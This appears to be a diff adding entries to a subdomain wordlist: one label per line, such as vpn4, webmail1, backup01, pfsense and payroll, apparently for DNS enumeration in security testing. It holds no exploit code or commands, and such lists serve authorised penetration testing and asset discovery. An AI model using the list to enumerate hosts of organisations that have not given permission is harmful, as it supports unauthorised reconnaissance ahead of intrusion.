+gaia
+hg
+history
+hostmaster
+imaps
+kali
+lan
+libguides
+mastodon
+mba
+med
+mmm
+nano
+ns03
+ntp3
+packages
+pix
+portail
+private
+puppet
+quiz
+r1
+rad
+rbl
+rms
+saturn
+sf
+sharepoint
+solar
+tester
+thor
+tour
+up
+vcs
+voip2
+webconf
+webinar
+work
+www7
+3cx
+a3
+adsl
+api-dev
+asd
+audio
+auto
+backup1
+bc
+big
+bridge
+ccs
+cluster
+compras
+dk
+dom
+ecommerce
+ee
+encuestas
+energy
+erasmus
+example
+gemini
+gw3
+host2
+hq
+hu
+iam
+identity
+ipa
+iphone
+kvm
+lb1
+line
+mailgw
+mailrelay
+mega
+mirrors
+museum
+myaccount
+notes
+notify
+now
+panda
+pbs
+reseller
+root
+sh
+shopping
+sklep
+ssp
+vm2
+vmware
+waf
+web02
+webhosting
+webmail1
+wwww
+yes
+zero
+alt
+apis
+asia
+astro
+atendimento
+athena
+athletics
+atlassian-bounces
+atom
+attendance
+biblio
+brand
+callcenter
+car
+cd
+ch
+comp
+cw
+dash
+delivery
+demo3
+desktop
+dns02
+dns6
+do
+e-learning
+emailmkt
+explore
+eye
+fast
+fb
+fit
+freeaday
+gestion
+gs
+harbor
+housing
+journal
+ko
+legal
+mac
+mail6
+maintenance
+mantis
+mb
+mfa
+mp3
+mx0
+nat
+newmail
+newsite
+nube
+omada
+pad
+pagos
+periodicos
+planet
+ppp
+proyectos
+recruitment
+smile
+spf
+srv1
+studio
+t2
+test5
+testmail
+tiger
+transport
+trust
+tw
+uc
+w1
+webmail3
+webtv
+world
+zzz
+ace
+ag
+bio
+bob
+bounces
+catalogue
+cpa
+cursos
+dd
+dr
+drupal
+epay
+ext
+fox
+freedom
+ftps
+hd
+hotel
+hugo
+ics
+img2
+inside
+intern
+license
+limesurvey
+mag
+magazine
+mcs
+money
+moodle2
+node1
+noticias
+nsa
+o
+oauth
+oos
+openid
+oscar
+oss
+payroll
+pg
+plus
+pp
+pve
+pve1
+registration
+relay1
+rh
+ro
+rp
+sample
+scan
+sea
+sga
+sign
+sma
+smtp5
+soc
+spider
+sports
+sps
+ssc
+tel
+tesla
+traefik
+trinity
+ubuntu
+ups
+v3
+veeam
+vision
+w2
+webapi
+wm
+workspace
+www.api
+zbx
+12
+alice
+audit
+avideos
+b1
+back
+backoffice
+banner
+biz
+black
+board
+builder
+cameras
+catalogo
+ce
+clicks
+cloud2
+contact
+cse
+des
+earth
+easy
+edi
+faculty
+fish
+forest
+ghost
+golf
+h
+insight
+journals
+kids
+kim
+landing
+libre
+loki
+medicina
+meta
+monitor2
+monitoreo
+mssql
+multimedia
+mumble
+mx6
+myhome
+ng
+nginx
+nice
+node
+ns13
+ok
+oms
+opa
+opasuite
+pfsense
+php
+phpipam
+pic
+press
+projetos
+pv
+relay3
+rm
+robin
+rpki
+s4
+safety
+selfcare
+server4
+sic
+silver
+soft
+sq
+static2
+stg
+ttt
+ua
+updates
+victoria
+voip1
+vpn4
+webdav
+wireguard
+www8
+www.demo
+www.new
+www.news
+wwwtest
+zoom
+10
+111
+a2
+aa
+ab
+acesso
+acm
+ada
+ais
+andromeda
+apex
+apidev
+apitest
+artemis
+at
+az
+bitwarden
+bookstore
+boss
+br
+broadcast
+bu
+bw
+cdn3
+chi
+cl
+classic
+cms2
+cnc
+d2
+database
+demos
+dev4
+development
+discover
+dsl
+elk
+engage
+era
+eset
+eu
+form
+ged
+giving
+grid
+hms
+house
+indico
+ios
+ispconfig
+james
+janus
+jc
+kc
+koha
+light
+listes
+lk
+lm
+mail02
+mailgate
+martin
+mat
+meetings
+metro
+minhaconexao
+mytest
+netmon
+observatorio
+office365
+ookla
+order
+park
+pdns
+pf
+plex
+podcast
+premium
+provisioning
+quest
+real
+ri
+riot
+rsync
+sat
+see
+ses
+sid
+smoke
+smtp6
+smtps
+sns
+st2
+study
+surveys
+tc
+telefonia
+test123
+tienda
+tmp
+tourism
+tower
+tp
+tube
+web7
+white
+workflow
+ws2
+www.library
+accounting
+admin1
+adserver
+adv
+ae
+agent
+air
+alert
+alizeo
+amazon
+annuaire
+antares
+apc
+aps
+asp
+auth2
+bank
+bd
+bis
+bit
+block
+broker
+bus
+buy
+c1o1
+care
+cdn77
+cf
+class
+co
+com
+corporate
+cosmos
+cps
+cultura
+cv
+dad
+dados
+db3
+dc1
+dcs
+develop
+dhcp2
+diploma
+dmc
+dp
+drm
+dynamic
+eagle
+ebill
+eis
+entry
+esp
+et
+eureka
+europe
+f1
+farm
+fc
+filter
+fp
+ga
+gandalf
+gc
+give
+gl
+hpc
+hyperion
+iperf
+ivan
+jm
+joker
+joomla
+joy
+kk
+km
+kp
+kr
+kt
+lb2
+lc
+london
+lotus
+mail0
+mail03
+mailx
+mall
+marco
+mes
+mgt
+mh
+momo
+msn
+mw
+myip
+nb
+nebula
+omni
+pac
+passbolt
+pds
+pegasus
+poc
+posta
+power
+psi
+pve2
+rancher
+rcs
+rest
+review
+rock
+rr
+ruby
+scc
+sei
+ser
+server01
+signup
+sim
+sn
+so
+super
+tele
+template
+testtest
+th
+ticketing
+triton
+tst
+uni
+vega
+view
+water
+wd
+web6
+webvpn
+whatsapp
+wow
+www.cloud
+www.cs
+www-dev
+www.en
+www.info
+www.old
+www.sms
+www.staging
+www.wiki
+you
+8
+act
+ali
+angel
+antivirus
+ariel
+article
+asa
+astra
+atm
+auction
+bk
+bm
+borg
+canvas
+cap
+casper
+cec
+certificados
+check
+chem
+controller
+cts
+dec
+demo4
+deploy
+dis
+doh
+dtdsendgrid
+echo
+emp
+error
+ev
+evolution
+ex
+express
+fe
+fenix
+fire
+first
+flashman
+flux
+formation
+fusion
+gamma
+gg
+hal
+ham
+he
+hh
+hi
+hm
+home2
+host1
+hris
+hrms
+idm
+informatica
+integra
+invest
+invoice
+ips
+ipsec
+ja
+jellyfin
+kiosk
+ks
+l2tp
+logos
+lt
+lucky
+lynx
+magic
+mails
+mcu
+mds
+mia
+mobi
+mooc
+mps
+msp
+mtest
+na
+new2
+news2
+nvr
+olp
+om
+osiris
+osticket
+papercut
+pilot
+player
+portfolio
+prov
+pruebas
+r3
+re
+res
+royal
+s5
+safe
+salt
+sar
+scs
+sdp
+sds
+secure2
+servicos
+shadow
+skynet
+slave
+solaris
+source
+speedtest3
+speedy
+squid
+srv2
+sst
+stargate
+sti
+sub
+summit
+sunny
+ta
+tableau
+tftp
+tiny
+v1
+vas
+voyager
+vpn01
+vps2
+vvv
+webftp
+webrtc
+webstats
+wedding
+wind
+wms
+wss
+www9
+www.admin
+www.cdn
+wwwdev
+www.international
+www.math
+www.moodle
+www.my
+wwwold
+www.speedtest
+y
+zen
+1234
+222
+5
+999
+agora
+aircontrol
+ajax
+alma
+app3
+arc
+assist
+ats
+aulavirtual
+azure
+baby
+bbb2
+beauty
+bgp
+bl
+border
+bp
+bsc
+btc
+cac
+cam1
+capacitacion
+card
+cci
+cdr
+ces
+cgi
+citrix
+city
+clock
+coffee
+contacts
+correio
+cri
+crs
+d1
+daniel
+datacenter
+david
+dcc
+dev-api
+documentos
+dsa
+dss
+dt
+eden
+edoc
+eip
+elecciones
+eml
+enroll
+extension
+feeds
+fi
+fileserver
+film
+focus
+formularios
+friends
+github
+gpt
+grace
+gt
+h1
+hades
+helios
+hosting1
+hybrid
+idea
+inc
+infra
+inventario
+k8s
+katalog
+kh
+listserv
+lll
+logger
+lync
+mail8
+mango
+may
+michael
+mint
+misc
+more
+mrtg2
+mysite
+nsb
+nss
+ocsp
+opennms
+oracle
+otp
+ouvidoria
+pb
+physics
+pk
+port
+profile
+psc
+pwd
+read
+rich
+river
+sage
+samsung
+sem
+seven
+sgs
+sin
+sipac
+smail
+smb
+smtp02
+solo
+spc
+storm
+sweet
+td
+terra
+test6
+testapi
+tic
+tim
+tk
+to
+ts1
+tts
+turismo
+union
+upgrade
+vet
+viper
+wave
+web11
+whmcs
+wise
+wolf
+ws1
+www10
+www.app
+www.beta
+www.biblioteca
+www.it
+xml
+xyz
+yoda
+zebra
+zion
+365
+7
+abuse
+academico
+active
+adc
+aim
+al
+alan
+alexa
+anime
+anna
+api1
+as2
+ase
+ash
+asset
+autodiscover.o365
+autodiscover.student
+backups
+bbc
+becas
+bip
+blackhole
+bo
+bonus
+bt
+cats
+cb
+centos
+cisco-capwap-controller
+clientes
+cnmaestro
+cns
+cobra
+comet
+corona
+cs2
+csi
+ctc
+cte
+customers
+cz
+dance
+dealer
+destiny
+dh
+dj
+dnsadmin
+dot
+dsc
+dsi
+dsm
+dst
+dw
+ebok
+ed
+editor
+edms
+egresados
+elastic
+elearn
+elephant
+elite
+emergency
+emma
+ent
+eos
+eps
+eris
+expo
+fa
+face5012
+fcc
+firmware
+forge
+fun
+fw01
+garden
+gestao
+gift
+graphs
+greg
+hc
+hw
+ie
+imp
+impact
+indicadores
+inet
+isc
+joe
+jump
+kerberos
+kevin
+keys
+kiss
+kiwi
+korea
+kpi
+la
+land
+laptop
+lis
+lod
+loja
+maestro
+magento
+mail7
+mailout
+mapa
+marina
+mark
+mas
+mike
+mj
+mmc
+mo
+moe
+monit
+movie
+mta2
+mu
+mymail
+myportal
+nfsen
+nic
+no
+node2
+notifications
+ntfy
+on
+ott
+outdoor
+p2
+panorama
+paste
+peter
+pptp
+pre
+printer
+quantum
+quarantine
+rainbow
+rec
+rep
+revista
+rex
+saga
+santa
+schedule
+scp
+sendmail
+siem
+sigaa
+sme
+smetrics
+snow
+soa
+spa
+srs
+st1
+statistics
+storage1
+story
+sympa
+tag
+taiga
+talent
+tax
+tec
+telegram
+test9
+ti
+time2
+ts2
+twitter
+uranus
+valhalla
+vcsa
+vpntest
+webcam
+webs
+welcome
+www-test
+xx
+zabbix2
+0
+000
+11
+25
+666
+777
+99
+aaaa
+abcd
+academia
+acceleride
+acceso
+adam
+af
+alarm
+alertus
+amc
+arm
+asdf
+awstats
+b3
+bart
+be
+bell
+berlin
+bes
+bok
+bpm
+bravo
+brown
+cabinet
+caldav
+careertraining
+cbc
+cbs
+cdc
+cds
+ceo
+chemistry
+chris
+cic
+civil
+clc
+clickemailmkt
+cloud1
+concursos
+coop
+cos
+coupon
+crystal
+cs1
+csr
+dae
+datos
+default
+desk
+devtest
+dhcp1
+d.sourcepoint
+dump
+ebooks
+ecm
+editora
+educacion
+el
+emails
+ep
+epaper
+eric
+ert
+esb
+f2
+felix
+fff
+fileshare
+firefly
+fl
+flex
+fotos
+french
+frost
+fruit
+ft
+fw3
+fx
+gen
+george
+ges
+get
+gh
+good
+goto
+grad
+graphite
+grupos
+gtm
+gts
+guarani
+guide
+h2
+hero
+hhh
+hot
+http
+ii
+index
+inf
+infinity
+insurance
+intranet2
+ipc
+iss
+japan
+jj
+juniper
+kamera
+kbs
+key
+khan
+kid
+knowledge
+lee
+leon
+li
+libra
+lic
+lion
+ls
+lucas
+lux
+mail9
+mailfilter
+mapi
+medusa
+mesh
+messenger
+mgmt
+mic
+mijn
+minerva
+mini
+mir
+misp
+n2
+nav
+news1
+newsletters
+nk
+nntp
+novo
+office2
+oldwww
+openvas
+page
+pas
+paul
+pd
+peace
+pergamum
+ph
+pixel
+plan
+planning
+platform
+pmo
+polaris
+portal1
+president
+primary
+privacy
+production
+provision
+psp
+psy
+pulse
+qms
+qrcode
+quartz
+ray
+rbs
+rev
+rnd
+robot
+rocketchat
+rose
+router2
+run
+s7
+samba
+san
+sbc1
+sbs
+sca
+scripts
+seb
+sendy
+serv
+setup
+shark
+sia
+signature
+simple
+smith
+smpp
+sogo
+spark
+spb
+speed2
+ssb
+stan
+startup
+stc
+stella
+stud
+studyabroad
+sunrise
+sus
+systems
+t3
+taurus
+teams
+teamspeak
+test8
+tests
+teszt
+tlc
+toto
+tss
+tunnel
+tux
+v4
+v6
+verify
+vhost
+volunteer
+vps1
+vv
+vw
+wac
+wanguard
+watch
+web03
+web04
+web10
+webadmin
+webcast
+webchat
+webdesign
+webhook
+webshop
+wiki2
+workshop
+wowza
+www.intranet
+www.jobs
+www.live
+www-old
+www.online
+www.radio
+x-careertraining
+yoga
+youtrack
+zone
+100
+20
+333
+3d
+42
+88
+888
+8888
+admitere
+aes
+agency
+alaska
+amber
+an
+anderson
+api-test
+apm
+aqua
+arena
+arquivos
+arthur
+asr
+atc
+au
+autodiscover.test
+awx
+ba
+bac
+bacula
+banana
+bas
+bbb3
+bear
+beta2
+bibliotecas
+bingo
+bird
+blacklist
+bluesky
+bnc
+brain
+bts
+ca1
+cache1
+cad
+campaigntest
+canada
+castle
+castor
+cca
+ccm
+cem
+center
+cerberus
+ceres
+chatwoot
+cherry
+cie
+cj
+codashop
+comm
+contratos
+counseling
+cpc
+creative
+crl
+crypto
+csa
+ctl
+culture
+d3
+dan
+dave
+db01
+dba
+dc2
+dc3
+del
+deportes
+dev5
+devportal
+dir
+discovery
+dmp
+dna
+don
+donate
+download2
+dpa
+dti
+dummy
+ea
+edge2
+editorial
+edm
+emerald
+emi
+engineering
+eugene
+expe
+falcon
+fd
+fisica
+fog
+franklin
+freebsd
+fresh
+ftp3
+ftp4
+funny
+g2
+gas
+gateway2
+gb
+gd
+gea
+genesis
+geoserver
+ggg
+groupware
+gsc
+guacamole
+guardian
+haproxy
+heart
+hercules
+hestia
+homeassistant
+homer
+hope
+host3
+hosting3
+ht
+hunter
+ibs
+imap4
+img1
+imgs
+india
+innovation
+install
+integracao
+ipad
+ise
+itadmin
+itsm
+jack
+jade
+john
+johnson
+jones
+jt
+kgb
+kimai
+kkk
+kl
+ksc
+lamp
+lea
+liberty
+lite
+livechat
+lol
+lv
+m3
+mail-out
+manual
+marketplace
+mcc
+mgw
+milano
+morgan
+msk
+mx10
+nas1
+nas2
+nautilus
+newsroom
+noname
+nono
+npm
+ns04
+ns15
+ns21
+ntc
+ntp4
+ooo
+opensignal
+opensource
+orders
+orientation
+outbound
+p1
+partage
+pdc
+pdi
+personal
+pet
+pgsql
+pierre
+pip
+playground
+police
+poseidon
+postfix
+prism
+property
+proxy3
+ps2
+pss
+pts
+pulsar
+pve3
+qc
+qqq
+queen
+rancid
+rb
+rdns1
+recipes
+remoto
+reporting
+reset
+resources
+rg
+rom
+rs2
+s12
+s6
+sakura
+sara
+sbc2
+sci
+seal
+server02
+server6
+sgd
+show
+siga
+sigrh
+smc
+smtp-out
+song
+sophia
+sr
+srv01
+ssm
+staging2
+static1
+stem
+subscribe
+summer
+synergy
+tango
+tao
+tbs
+te
+tea
+templates
+test01
+test7
+testadmin
+testbed
+tg
+tik
+tl
+tnt
+toolbox
+trading
+tuyensinh
+ubnt
+ultra
+ums
+van
+video2
+visit
+vm3
+vs1
+wan
+waw
+web8
+wizard
+wps
+wptest
+www.billing
+www.chat
+www.lib
+www.music
+www.tv
+wx
+youth
+youtube
+yu
+zz
+101
+12345
+6
+66
+9
+9999
+aai
+about
+admision
+afs
+agro
+aims
+ajuda
+alfresco
+ama
+andre
+any
+aod
+apolo
+application
+apps2
+appstore
+apptest
+articles
+arts
+asap
+asc
+ask
+asterix
+aura
+autodiscover.e
+avalon
+backup3
+bastion
+bcc
+betty
+bib
+bid
+bike
+bkp
+blocked
+bsa
+bsd
+ca2
+calc
+can
+captive
+carbon
+cars
+cash
+cce
+cel
+centreon
+chinese
+cia
+cit
+ck
+clearpass
+cma
+cmc
+coco
+collector
+color
+communication
+company
+conferences
+construction
+cool
+cop
+coral
+coronavirus
+counter
+cp1
+cpd
+csd
+cti
+cup
+dada
+dap
+dds
+debug
+dee
+degreeworks
+dell
+dem
+den
+developers
+df
+di
+diablo
+dit
+dns0
+dns-1
+dns-2
+documentation
+domino
+dps
+ecampus
+ece
+ecom
+ecs
+eduvpn
+edx
+eee
+ees
+eleicoes
+elink
+encuesta
+esx2
+europa
+eve
+facilities
+fas
+fbi
+feed
+fg
+fin
+firma
+fly
+fortune
+forward
+fred
+freeradius
+frontend
+future
+galileo
+garage
+genius
+geofeed
+geoportal
+gigya
+gogo
+gopher
+gravity
+greenhouse
+gslb
+gsuite
+gw4
+hana
+harry
+healthcare
+helix
+homologacao
+ib
+ict
+ida
+ing
+ipr
+ipt
+iron
+isa
+jam
+jan
+jr
+jupyter
+kanboard
+ki
+kino
+kit
+krill
+l2
+lara
+led
+lgpd
+lin
+live2
+lss
+lulu
+mad
+mail10
+mailcleaner
+mailhub
+mais
+markus
+materiais
+matt
+mbc
+mda
+mei
+messaging
+meteo
+mf
+mib
+milan
+mine
+mobileapp
+mom
+mos
+movies
+mq
+ms1
+multi
+mx03
+mx20
+mx7
+myphone
+mysql2
+nemesis
+neptun
+nestor
+neu
+neuro
+newton
+nfs
+nfs1
+nis
+nn
+nomad
+nps
+ns14
+ns22
+nsc
+nursing
+ny
+oferta
+ol
+oldsite
+oldweb
+omp
+oo
+osm
+ots
+outbound.intercom
+owl
+pam
+paper
+paris
+parts
+pat
+pec
+penguin
+personnel
+pgd
+pharmacy
+phones
+pics
+pie
+pkg
+platinum
+plaza
+pmp
+portaltest
+postal
+postfixadmin
+proveedores
+psa
+r5
+ram
+redis
+registro
+reportes
+rio
+ris
+rmm
+roma
+rosa
+rrhh
+rspamd
+rtc
+s10
+s9
+salud
+saml
+save
+sct
+secret
+seg
+server5
+servis
+sex
+short
+sigadmin
+sip.student
+sit
+sj
+smsgw
+smtp-relay
+sofia
+solr
+solutions
+sonar
+sophos
+spamtitan
+spec
+speed1
+spi
+srv3
+srv4
+ssa
+ssss
+stage2
+steve
+sum
+supervision
+sushi
+tacacs
+tai
+tank
+tcs
+tek
+telco
+telefon
+terminal
+test-api
+tet
+texas
+tf
+thomas
+timesheet
+tmail
+todo
+traccar
+trade
+tramites
+turbo
+ufo
+um
+userside
+vesta
+victor
+vidapi
+villa
+vista
+vmail
+vn
+vortex
+vox
+vp
+wb
+wc
+webmin
+wellness
+west
+wf
+wilson
+wlan
+wtf
+www0
+www.apps
+www.events
+www.health
+www.help
+www.media
+www.promo
+www.sport
+www.video
+xibo
+yellow
+zh
+zmail
+1111
+119
+123456
+133
+1c
+2020
+22
+44
+55
+a4
+aaaaa
+aca
+acreditacion
+activate
+ade
+advance
+affiliate
+africa
+agi
+agriculture
+albert
+album
+alexandria
+alien
+altair
+amd
+ami
+ana
+andrew
+a.ns
+ap1
+ap2
+aquarium
+ara
+arcgis
+ark
+arnold
+asm
+ass
+assets1
+assets2
+assets3
+asu
+audi
+auth1
+automation
+ayuda
+bal
+banners
+bar
+bcp
+bee
+ben
+bh
+bienestar
+bim
+bitcoin
+bitrix
+blank
+b.ns
+boe
+boot
+boutique
+bpi
+brian
+bsi
+bss
+bst
+bv
+cam2
+camp
+campaigndev
+cams
+candy
+canon
+cbm
+cbt
+ccb
+ccp
+ccv
+cdn4
+centrum
+cep
+cg
+charlie
+checkin
+cheese
+chess
+chs
+cinema
+cirrus
+cmm
+colin
+commerce
+commportal
+compass
+compliance
+con
+condor
+congdoan
+contest
+conteudo
+course
+cox
+cpp
+crc
+cricket
+cron
+cruise
+csm
+csp
+cta
+cube
+d4
+daisy
+dam
+date
+dating
+day
+dbs
+dg
+dhl
+dia
+dim
+dino
+dma
+dmi
+doctor
+domaindnszones
+dppd
+drop
+drs
+ds1
+dts
+dz
+ebs
+ecc
+eclipse
+economia
+eform
+eg
+electronics
+eli
+elm
+elo
+elysium
+endpoint
+enews
+epp
+eros
+esa
+esx1
+eval
+evergreen
+ews
+expert
+face
+find
+fine
+ford
+forestdnszones
+fortianalyzer
+foundation
+france
+frank
+freenas
+ftp01
+g1
+gatekeeper
+gc2
+gifts
+gms
+god
+golden
+gollum
+gr
+graf
+group
+gru
+gw6
+gws
+han
+heimdall
+helium
+hhs
+homologa
+hop
+horde
+hotels
+html
+huawei
+idc
+idefix
+idp2
+ifs
+iii
+iis
+imail
+imap2
+integration
+interactive
+interno
+investigacion
+ipplan
+isi
+isis
+iti
+itsupport
+jaguar
+jasper
+jazz
+jb
+jojo
+juan
+juno
+justin
+kamery
+karma
+khaosat
+kmc
+kronos
+kube
+lab1
+lake
+ldap3
+lemon
+les
+lighthouse
+lim
+lima
+lms2
+login2
+lucy
+lyncdiscover.student
+m4
+magnolia
+mail20
+mailgateway
+mailstore
+maple
+maria
+marvin
+mdp
+memo
+micro
+mira
+miracle
+mit
+mls
+mobility
+mon2
+mongo
+monster
+morpheus
+motion
+mouse
+mov
+mtc
+mtp
+myapps
+mycloud
+mysql01
+nac
+name
+navi
+nemo
+neon
+newlife
+nit
+nm
+nms2
+noah
+note
+np
+ns-1
+ns20
+nsp
+ntop
+nuage
+nv
+octopus
+oldwebmail
+onyx
+opendata
+operations
+orc
+ot
+ota
+oxidized
+oxygen
+oz
+pal
+paragon
+pascal
+patrimonio
+pbx1
+pearl
+phil
+pin
+pine
+pluton
+po
+pol
+pomoc
+pool
+pop2
+pop3s
+postgres
+ppa
+pps
+prep
+proplan
+publish
+purple
+python
+qq
+quality
+qwe
+r6
+rabbit
+rad1
+radius3
+rain
+random
+rbc
+rdns2
+recherche
+registrar
+rem
+renaissance
+researchdelft
+resolver
+restore
+ricardo
+richard
+rob
+robotics
+room
+router1
+roxy
+rpi
+rwhois
+s01
+s15
+s8
+saa
+sal
+sao
+say
+sdh
+sdr
+secure1
+seguridad
+senat
+sensor
+sentinel
+seoul
+servidor
+serwis
+shared
+shibboleth
+shiny
+simba
+sip3
+sipexternal
+smp
+smt
+smtpauth
+soap
+socket
+splunk
+spock
+spp
+sql2
+srm
+ss1
+ssg
+sta
+stars
+stb
+stephan
+stratus
+success
+superman
+svc
+switch
+sz
+t4
+tardis
+tempo
+tennis
+tera
+tes
+text
+tfs
+the
+tick
+timmy
+tokyo
+tool
+tor
+tos
+total
+tr069
+tri
+trial
+tyler
+unifi2
+unify
+unix
+uploads
+urban
+usc
+utility
+utils
+utopia
+va
+vaultwarden
+vestibular
+victory
+vidapi1
+vidapi2
+vidapi.more
+vietnam
+vincent
+vinculacion
+virtual2
+virus
+vl
+vpbx
+vpn02
+vps3
+vss
+warez
+watson
+way
+webhooks
+webportal
+websites
+wh
+who
+widget
+wine
+winplus
+ws3
+www11
+www.admissions
+www.connect
+www.cp
+www.cpa
+www.dados
+www.education
+www.helpdesk
+www.mobile
+www.panel
+www.revistas
+www.ru
+www.stats
+www.turismo
+www.vestibular
+www.winplus
+yolo
+ys
+zap
+zm
+zombie
+zulu
+11111
+121
+126
+13
+138
+15
+168
+17
+200
+21
+221
+23
+300
+444
+911
+abe
+abi
+academic
+activesync
+ad01
+ad1
+aj
+alba
+all
+allan
+alliance
+ant
+anthony
+anubis
+app4
+app5
+app7
+aq
+aquila
+aria
+arms
+aruba
+aruba-master
+as1
+assets0
+assets4
+assistenza
+ast
+asta
+atl
+atlantis
+avs
+avto
+aw
+axis
+bamboo
+bao
+batman
+bbq
+beacon
+bean
+bf
+bigbluebutton
+bigbrother
+bigdata
+bin
+bj
+blackboard
+blackbox
+blueberry
+bn
+bookstack
+boom
+bots
+bps
+bruno
+builds
+bulk
+bulletin
+butler
+cacti2
+caps
+captain
+cdp
+cdt
+celebrate
+cet
+cfc
+chaos
+checkmk
+chmura
+church
+cla
+clean
+clio
+cloudpbx
+cls
+clsdkim
+cmi
+cmstest
+cod
+coe
+cognos
+collab
+collections
+comercial
+common
+computer
+conferencia
+convenios
+courrier
+covid
+cp2
+cpm
+cpr
+crm2
+cva
+cy
+cyber
+d5
+dac
+dark
+das
+ddd
+demo5
+depot
+desarrollo
+dev-portal
+dgp
+dimension
+directorio
+diversity
+dn
+docker2
+doe
+dokuwiki
+dolphin
+dos
+drone
+dws
+dx
+e1
+e2
+eac
+east
+econ
+edelweiss
+edge1
+edison
+edit
+egressos
+eko
+ema
+e-mail
+enterpriseregistration.student
+env
+envios
+epc
+epic
+eportfolio
+eprints
+er
+ergo
+eservices
+esm
+euro
+exams
+excellent
+farmacia
+fcs
+fen
+fenrir
+fleet
+flower
+for
+fort
+forum2
+frc
+frodo
+fs2
+fsm
+fst
+gala
+galeria
+gambit
+gdocs
+gec
+geek
+general
+generator
+ger
+germany
+gig
+gimli
+gk
+gnu
+graduate
+graficos
+grant
+gsa
+guru
+hall
+halo
+hao
+hardware
+harmony
+hcc
+hcs
+hds
+here
+heritage
+hide
+hip
+historia
+hit
+hn
+ho
+homebase
+homolog
+honors
+hospital
+hosting4
+hrs
+hsc
+hudson
+i1
+icb
+icc
+icon
+icq
+ids
+ieee
+ies
+igor
+images2
+imagine
+imc
+inbox
+inclusion
+indigo
+indonesia
+industrial
+influxdb
+information
+init
+inspire
+integrator
+inter
+ipa-ca
+ipo
+ira
+iran
+isd
+itc
+itech
+ito
+jag
+java
+jenny
+jesus
+jh
+jjj
+jk
+jo
+johan
+junior
+ka
+kai
+kaspersky
+kazan
+kip
+kis
+kraken
+kuma
+kvm2
+lab2
+landscape
+lcs
+leonardo
+lex
+libcal
+linda
+lisa
+live3
+llm
+lms3
+lo
+log2
+lola
+lost
+luck
+luke
+mail-relay
+maison
+mamba
+mar
+matricula
+maya
+mbox
+mbs
+mc1
+mca
+m.catalog
+mce
+mcp
+mediaserver
+meow
+mercure
+merlin
+mesadeayuda
+metis
+mikrotik
+mimosa
+mist
+mix
+mmi
+mmp
+mob
+model
+modern
+monica
+monitor1
+moscow
+mpa
+mpc
+msa
+msc
+mss
+mta1
+mtprotoline
+murphy
+musica
+mvc
+mx04
+mx8
+myserver
+nathan
+ncc
+nelson
+nine
+nms1
+noc2
+nora
+nostromo
+ns16
+ns17
+ns-2
+ntp0
+oa
+oak
+offline
+og
+oia
+olympic
+oma
+onix
+openpgpkey
+oper
+otto
+ovo
+ox
+p2p
+palm
+par
+paradise
+patrick
+pbx2
+pcc
+pcs
+pdm
+ped
+peertube
+pentest
+perseus
+pes
+pgadmin
+phi
+place
+pod
+poi
+point
+poker
+polare
+pollux
+pom
+portal3
+porter
+posgrado
+ppm
+ppt
+prepaid
+price
+pride
+prince
+products
+protect
+prs
+publications
+pubsub
+quark
+qwerty
+r2d2
+radius01
+raspberry
+rdap
+rdns
+relatorio
+remoteapp
+renew
+reservas
+results
+resume
+reverse
+rise
+riverside
+road
+roaming
+robinson
+rogers
+ron
+rpt
+rs1
+rsp
+rt2
+rti
+rtmp
+rust
+s02
+s11
+s13
+sad
+saf
+safari
+sale
+salon
+sami
+sand
+sandy
+sapphire
+sbc01
+scanner
+scholarships
+scratch
+secrets
+sen
+serenity
+server10
+set
+shiva
+shs
+signage
+sitios
+six
+sklad
+sks
+skyline
+smarthost
+smtp7
+smtpout
+sniper
+solid
+solomon
+solution
+sondage
+spanish
+spirit
+sso2
+ssw
+starlight
+starwars
+static3
+stats2
+stefan
+step
+stm
+sto
+stork
+sugar
+sunshine
+support2
+sustainability
+sy
+tac
+tak
+task
+tasks
+tata
+taxi
+tb
+tcp
+teach
+technology
+tender
+test0
+test1234
+testdomain
+testssl
+testwww
+thanks
+tile
+tiles
+time1
+tina
+tip
+tls
+tmc
+tony
+topup
+tps
+tree
+treinamento
+tttt
+tu
+tz
+ui
+unicorn
+unity
+unknown
+vendas
+vie
+viola
+visa
+visio
+vt
+w4
+wbs
+we
+web9
+web-dev
+weblog
+webmail.test
+webster
+well
+what
+why
+wild
+windows
+wit
+wood
+ws4
+www.art
+www.business
+www.careers
+www.catalog
+www.crm
+www.cultura
+www.digital
+www.elearning
+www.finance
+www.forums
+www.internet
+www.lms
+www.map
+www.maps
+www.mba
+www.medicina
+wwwnew
+www.newsletter
+www.sklep
+www.test2
+www.travel
+www.web
+x1
+xnet
+xray
+xxxx
+xxxxx
+yang
+yum
+yun
+z1
+zoo
+01
+102
+104
+1122
+1216
+122
+125
+134
+137
+14
+148
+188
+1st
+2000
+234
+24
+321
+33
+555
+accommodation
+accreditation
+ad2
+administracion
+administrator
+admiral
+adrian
+adt
+adventure
+aegis
+agri
+ah
+akademia
+albatros
+aldebaran
+alexis
+alternative
+alto
+amail
+amanda
+amos
+amt
+and
+angela
+anonymous
+antigo
+apache
+ape
+api3
+apic
+api.dev
+api-gateway
+api-staging
+apk
+app10
+app11
+arda
+argo
+arhiva
+ariadne
+arquivo
+arsenal
+asgard
+aspire
+assessment
+assets5
+assets6
+assets7
+assets8
+assets9
+atelier
+atmosphere
+atp
+austin
+autodiscover.alumni
+avaliacao
+aviation
+avl
+ax
+axel
+b2
+backup01
+backup02
+bad
+balance
+basket
+bay
+bba
+bbt
+bella
+bender
+bert
+bethel
+bhs
+bible
+bic
+billpay
+bloqueio
+blr
+bmp
+bnm
+bond
+boris
+bos
+bsp
+btest
+budget
+buffalo
+bug
+bumblebee
+bunker
+by
+cab
+cactus
+camelot
+capital
+carbonio
+cards
+carolina
+cart
+carter
+cc1
+ccoc
+ccr
+cdm
+cea
+ced
+cee
+certs
+cesar
+ceua
+cha
+change
+charon
+chat2
+chef
+cim
+cir
+citrus
+claim
+claire
+cloud3
+cloudbackup
+clpdkim
+cms1
+cms3
+cna
+cnm
+cnt
+cockpit
+cohen
+collab-edge
+college
+colorado
+consult
+containers
+convocatorias
+cook
+cookies
+cooper
+cornerstone
+count
+country
+cpe
+cpv
+craft
+cris
+crowd
+crown
+cybersecurity
+daotao
+darkness
+datahub
+dca
+dcm
+def
+desenvolvimento
+designtest
+devadmin
+dev.api
+devapi
+device
+dev-www
+dev.www
+dhcp10
+dhcp12
+dhcp13
+disco
+discourse
+dist
+dlc
+dls
+dns7
+dnsbl
+doctorat
+document
+dodo
+dog
+doom
+dotnet
+drago
+dri
+ds2
+dubai
+dune
+duo
+dylan
+e3
+eabnavigate
+eagles
+eas
+ebay
+ebiz
+eds
+edt
+ef
+efa
+egg
+eh
+ehr
+ehs
+einstein
+elearning2
+elections
+elp
+elvis
+emby
+emr
+encore
+enigma
+enquete
+enrollment
+ens
+enterpriseenrollment.student
+entropy
